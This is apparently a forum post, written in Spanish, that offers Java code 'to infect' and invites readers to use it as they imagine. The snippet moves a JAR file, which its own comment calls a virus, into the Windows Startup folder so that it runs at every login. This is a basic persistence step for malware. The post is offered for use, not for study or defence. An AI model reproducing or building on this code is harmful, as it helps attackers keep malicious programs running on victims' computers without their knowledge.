13 Years of Service
61%
Please note, if you want to make a deal with this user, that it is blocked.
Aqui les dejo una forma de infectar con java les dejo el codigo usenlo a su imaginacion :cool1:
Code:
>import java.io.File;
public class Infection {
public static void MoveFile() {
File file = new File("Energized.jar");
File dir = new File("C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/");//gotta find a place too put this virus :S
boolean success = file.renameTo(new File(dir, file.getName()));
if (!success) {
System.out.println("Failed too move file to : "+dir);
} else {
System.out.println("Moved file sucessfully :)");
}
}
}